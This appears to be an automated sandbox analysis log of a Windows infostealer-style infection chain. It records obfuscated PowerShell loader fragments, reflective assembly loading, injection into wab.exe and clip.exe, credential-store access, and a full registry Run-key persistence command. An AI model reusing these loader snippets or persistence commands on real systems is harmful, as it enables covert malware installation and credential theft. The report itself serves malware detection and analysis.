            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line omitted]
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Antillean144.Gro && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
            Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "bynkefugls" /t REG_EXPAND_SZ /d "%Deciduate% -w 1 $Xdiv=(Get-ItemProperty -Path 'HKCU:\Clouters\').Slapperne;%Deciduate% ($Xdiv)"
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exe Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: pstorec.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: appresolver.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: bcp47langs.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: slc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sppc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: mswsock.dll
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: dnsapi.dll
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\PcmmMKygSewVgdnvXkjKwrsqcoRyaVFxntOTxZGoblcdKcSGqptWoAvhsTFYfzuOi\qDlmBUIvkRrWNd.exeSection loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\msftedit.dll
            Source: Window Recorder Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("PowerShell "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$E", "Unsupported parameter type 00000000")
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Ralph)$global:Rationernes = [System.Text.Encoding]::ASCII.GetString($Metalbearing)$global:Ferrimagnetic=$Rationernes.substring(320257,28981)<#Tinkler Apatetic Tuberkulosestationen #>
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Dreegh $Kloakeringsarbejder $Oprrsomraadet), (Sprhjulene47 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Afslidt = [AppDomain]::CurrentDomain.GetAssembli
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Flimsier)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Forsat, $false).DefineType($Symplesite, $Anfgtel
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Ralph)$global:Rationernes = [System.Text.Encoding]::ASCII.GetString($Metalbearing)$global:Ferrimagnetic=$Rationernes.substring(320257,28981)<#Tinkler Apatetic Tuberkulosestationen #>
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Hovedstrukturernes)$global:Lvhytterne = [System.Text.Encoding]::ASCII.GetString($Abjudicate)$global:Skikkelsens=$Lvhytterne.substring(314784,26302)<#Vigtigpraasen Manipulationssproge
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Nicodemite $Skadefries $Mismatching), (confederalist @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:tery = [AppDomain]::CurrentDomain.GetAssemblies()$glob
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Aguardiente)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Administrationsgrundlagenes, $false).DefineTy
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}…
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}…
            Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line]
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line]
            Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell command line]
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004044A4 LoadLibraryW, GetProcAddress, FreeLibrary, MessageBoxW

            Persistence and Installation Behavior

            Source: C:\Windows\SysWOW64\cmd.exe Process created: reg.exe

            Boot Survival

            Source: C:\Windows\SysWOW64\clip.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DJNLOJ3PER
            Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bynkefugls
            Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Vibeka
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_004047CB LoadLibraryA, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress, GetProcAddress
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
